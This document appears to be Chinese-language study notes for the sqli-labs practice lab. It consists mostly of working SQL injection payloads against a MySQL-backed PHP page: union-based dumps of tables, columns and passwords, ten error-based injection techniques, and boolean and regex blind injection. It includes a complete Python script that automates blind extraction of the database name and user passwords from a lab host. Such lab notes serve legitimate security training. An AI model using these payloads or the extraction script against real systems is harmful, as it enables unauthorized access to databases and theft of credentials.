sqlilabs

比较重要代码逻辑

$id=$_GET['id'];
$sql="select * from users where id='$id' limit 0,1";
$result = mysql_query($sql);
$row = mysql_fetch_array($result);
if($row){
    echo $row['username'];
    echo $row['passowrd'];
}else{
    print_r(mysql_error());
}

接收id参数值，构造sql语句，并且赋值变量命名为”sql”,执行sql语句赋值”result”变量，因为id可控，并且无过滤可跳出单引号，构造自己的sql语句，存在sql注入。

注入判断语句

1
2
3

注入测试语句
' and 1=2 %23
' and 1=1 %23

联合注入



测试字段
' order by 3%23

-1' union select 1,user(),database() %23


-1' union select 1,user(),database() %23


查表
-1' union select 1, group_concat(table_name),3 from information_schema.tables where table_schema="security" %23

查列名
-1' union select 1, group_concat(column_name),3 from information_schema.columns where table_name="users" %23


列名
username,password

表名
users

dump数据
-1' union select 1, group_concat(username),password from users %23

十种MySQL报错注入
报错注入
floor()

1 2	查用户 -1' and (select 1 from (select count(),concat(user(),floor(rand(0)2))x from information_schema.tables group by x)a) %23

爆库

1	-1' and (select 1 from (select count(),concat((SELECT schema_name from information_schema.schemata LIMIT 0,1),floor(rand(0)2))x from information_schema.tables group by x)a) %23

爆表

-1' and (select 1 from (select count(*),concat((SELECT table_name from information_schema.`TABLES` WHERE table_schema = database() LIMIT 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) %23

爆列

-1' and (select 1 from (select count(*),concat((SELECT column_name from information_schema.`COLUMNS` WHERE table_name="users" LIMIT 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a) %23

extractvalue()

1	extractvalue(1,concat(0x7e,(select user()),0x7e))

1	-1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.`TABLES` where table_schema=database() limit 1,1),0x7e)) %23

1	-1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.`COLUMNS` where table_name="users" limit 1,1),0x7e)) %23

十种注入

1.floor()

select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue()
select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));

4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

5.multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()
select * from test where id=1 and exp(~(select * from(select user())a));

布尔盲注
盲注常用函数:

length() 返回字符串的长度，可以返回数据库表明列名的长度
substr() 截取字符串。subster(string, start, length) 字符串, 从第几位截取，截取长度是多少
ascil() 返回ascil码

database:
security

盲注脚本，判断字段长度

1	1' and length(database())=9%23

1	1' and substr(database(),s,1)="s"%23

import requests
import re
class sql_true:
    def __init__(self,url):
        self.url = url

    def start(self):
        url = self.url + "-1' and exp(~(select * from(select database())a))%23"
        response = requests.get(url=url)
        print(response.content.decode('utf-8'))

    def lengths(self):
        len_errorr = "1' and length(database())=0%23"
        len1 = requests.get(url=self.url+len_errorr).headers['Content-Length']
        ints = 10
        for i in range(ints):
            str_sql = f"1' and length(database())={i}%23"
            url = self.url + str_sql 
            response = requests.get(url=url)
            #print(response.headers)
            lengths = response.headers['Content-Length']
            if len1 != lengths:
                print("库字段长度:",str(i))

    def database_result(self):
        s = 'abcdefghijklmnopqrstuvwxyz1234567890|'
        len_errorr = "1' and substr(database(),0,1)=\"*\"%23"
        len1 = requests.get(url=self.url+len_errorr).headers['Content-Length']
        result = ''
        for lens in range(25):
            for i in s:
                str_sql2 = f"1' and substr(database(),{lens},1)=\"{i}\"%23"
                url = self.url + str_sql2 
                response = requests.get(url=url)
                lengths = response.headers['Content-Length']
                if len1 != lengths:
                    result += str(i)
                    print(str(i)) 
        print(result)

    def tables_result(self):
        s = 'abcdefghijklmnopqrstuvwxyz1234567890|'
        len_errorr = "1' and substr(database(),0,1)=\"*\"%23"
        len1 = requests.get(url=self.url+len_errorr).headers['Content-Length']
        result = ''
        for lens in range(25):
            for i in s:
                str_sql2 = f"1' and substr((SELECT table_name from information_schema.`TABLES` WHERE table_schema = database() LIMIT 0,1),{lens},1)=\"{i}\"%23"
                url = self.url + str_sql2 
                response = requests.get(url=url)
                lengths = response.headers['Content-Length']
                if len1 != lengths:
                    result += str(i)
                    print(str(i)) 
        print(result)

    def columns_result(self):
        s = 'abcdefghijklmnopqrstuvwxyz1234567890|'
        len_errorr = "1' and substr(database(),0,1)=\"*\"%23"
        len1 = requests.get(url=self.url+len_errorr).headers['Content-Length']
        result = ''
        for lens in range(25):
            for i in s:
                str_sql2 = f"1' and substr((SELECT column_name from information_schema.`COLUMNS` WHERE table_name=\"users\" LIMIT 2,1),{lens},1)=\"{i}\"%23"
                url = self.url + str_sql2 
                response = requests.get(url=url)
                lengths = response.headers['Content-Length']
                if len1 != lengths:
                    result += str(i)
                    print(str(i)) 
        print(result)
    def dump(self):
        s = 'abcdefghijklmnopqrstuvwxyz1234567890|'
        len_errorr = "1' and substr(database(),0,1)=\"*\"%23"
        len1 = requests.get(url=self.url+len_errorr).headers['Content-Length']
        result = ''
        for lens in range(25):
            for i in s:
                str_sql2 = f"1' and substr((select password from users limit 1,1),{lens},1)=\"{i}\"%23"
                url = self.url + str_sql2
                response = requests.get(url=url)
                lengths = response.headers['Content-Length']
                if len1 != lengths:
                    result += str(i)
                    print(str(i)) 
        print(result)

if __name__ == "__main__":
    sql_run = sql_true("http://10.211.55.10/Less-1/?id=")
    #sql_run.database_result()
    #sql_run.tables_result()
    sql_run.dump()

正则表达式注入

1	1' and 1=(SELECT database() REGEXP '^se' LIMIT 1,1)%23

def re_sql(self):
    s = 'abcdefghijklmnopqrstuvwxyz1234567890'
    len_errorr = "1' and substr(database(),0,1)=\"*\"%23"
    len1 = requests.get(url=self.url+len_errorr).headers['Content-Length']
    sql_content = ''
    result = ''
    for c in range(20):
        for i in s:
            str_sql2 = f"1' and 1=(SELECT database() REGEXP '^{result+i}' LIMIT 1,1)%23"
            url = self.url + str_sql2
            response = requests.get(url=url)
            lengths = response.headers['Content-Length']
            if len1 != lengths:
                result += i
                #sql_content += i 
                print(str(i))
    print(result)